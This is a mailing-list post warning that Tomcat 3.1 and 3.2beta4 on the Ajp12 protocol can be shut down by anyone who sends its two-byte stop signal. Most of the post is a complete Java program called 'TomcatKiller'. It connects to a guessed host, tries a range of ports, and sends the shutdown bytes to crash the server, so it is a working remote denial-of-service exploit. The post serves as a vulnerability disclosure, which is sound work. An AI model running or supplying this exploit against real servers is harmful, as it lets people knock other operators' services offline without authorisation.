Hi all, just a word of warning about Tomcat 3.1 and from what I can
tell, 3.2beta4. Looking at the source code, if you're using Ajp12 for
the Apache-Tomcat comms protocol, be aware that the "Stop Tomcat"
batch/shell file does its job by sending "exit please" bytes to
Tomcat. It doesn't take much to spoof this, here's my TomcatKiller
class below. Just guess a host and port which may have Tomcat
running, and over it goes...
I patched the sources so hopefully it won't happen to me ;)
import java.net.*;
import java.io.*;
public class TomcatKiller {
static public void main( String[] args ) {
final byte SIGNAL = (byte)254;
final byte BYEBYE = (byte)15;
byte[] msg = { SIGNAL, BYEBYE };
int min = 8007, max = 8007;
String host = args[0];
try {
if( args.length > 1 )
min = max = Integer.parseInt( args[1] );
if( args.length > 2 )
max = Integer.parseInt( args[2] );
if( min > max ) {
int tmp = min;
min = max;
max = tmp;
}
for( int i = min; i <= max; i++ ) {
try {
Socket s = new Socket( host, i );
OutputStream os = s.getOutputStream();
os.write( msg );
os.flush();
break;
} catch( ConnectException ce ) {
System.err.println( "conn refused " + i );
} catch( IOException ioe ) {
ioe.printStackTrace();
break;
}
}
} catch( Exception e ) {
e.printStackTrace();
System.exit( 1 );
}
}
}
// eof
stu
--
Stuart Maclean, Research Associate
University of Washington
ITS Research Program, College of Engineering
Box 352500
Seattle, WA 98195-2500
Tel: (206) 543-0637
http://www.its.washington.edu
___________________________________________________________________________
To unsubscribe, send email to [EMAIL PROTECTED] and include in the body
of the message "signoff SERVLET-INTEREST".
Archives: http://archives.java.sun.com/archives/servlet-interest.html
Resources: http://java.sun.com/products/servlet/external-resources.html
LISTSERV Help: http://www.lsoft.com/manuals/user/user.html
